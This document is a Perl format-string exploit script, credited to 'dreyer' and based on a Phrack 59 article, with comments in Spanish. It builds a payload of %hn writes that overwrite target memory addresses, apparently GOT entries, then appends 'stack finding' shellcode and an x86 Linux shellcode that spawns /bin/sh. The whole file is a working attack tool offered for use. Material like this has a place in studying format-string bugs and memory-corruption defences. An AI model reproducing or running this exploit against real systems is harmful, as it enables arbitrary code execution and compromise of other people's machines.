#!/usr/bin/perl #Universal Format String exploit by dreyer # based on article of gera of phrack 59 # Kato inspired Stack Finding shellcode #Shellcode que encuentra la cadena y salta a la posicion siguiente a ella $stackfinding="\xbb\x4a\x41\x54\x4f\x43\x58\x39\xd8\x75\xfb\x54\xc3"; #Instrucciones que no hacen nada pero sirven para encontrar la shellcode $shellcode="KATOKKATOKKATOKKATO"; #Verdadera shellcode esta es la de Ripe $shellcode.="\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; $dirs=""; $writes=""; $count=0; $writeto="\xe0\xe0\xff\xbf"; #Donde colocamos la shellcode? sub dir_print { my $dir=pop; return sprintf("%c%c%c%c", $dir&0xFF, ($dir>>8)&0xFF, ($dir>>16)&0xFF, ($dir>>24)&0xFF ); } sub padding { my $aux=pop; $dirs=$aux; $count=length($aux); $stackpop+=$count/4; } sub prepare_fmt { my $cadena=pop; $count+=length($cadena)*4; } sub build_fmt { my ($what,$where)=@_; my $aux2; my $i=0,$j=length($what); map{$dirs.=&dir_print($where+$_)}0..$j-1; while ($i<$j) { my $trozo=substr($what,$i,1); if (($count&0xff)+4>ord($trozo)) { $aux2=0x100+ord($trozo)-($count&0xff); } else { $aux2=ord($trozo)-($count&0xff); } $writes.="\%${aux2}x\%${stackpop}\$hn"; $count+=$aux2; $i++; $stackpop++; } return $count; } if ($#ARGV<0) { print "Uso: $0 stackpop baseaddress entries\n"; #puedes sobreescribir toa la GOT XD exit; } $stackpop=$ARGV[0]; #parametros $dir=$ARGV[1]+0; $entries=$ARGV[2]; padding("A"x100); #Esto no es optimo pero da igual ;) my $dirc=$dir+0; for my $i(1..$entries) { $dirc+=4,next if !((($dirc)&0xff) && (($dirc>>8)&0xff) && (($dirc>>16)&0xff) && (($dirc>>24)&0xff)); prepare_fmt($writeto); $dirc+=4; } prepare_fmt($stackfinding); for my $i(1..$entries) { $dir+=4,next if !((($dir)&0xff) && (($dir>>8)&0xff) && (($dir>>16)&0xff) && (($dir>>24)&0xff)); build_fmt($writeto,$dir); $dir+=4; } build_fmt($stackfinding,0xbfffe0e0); print $dirs.$writes.$shellcode;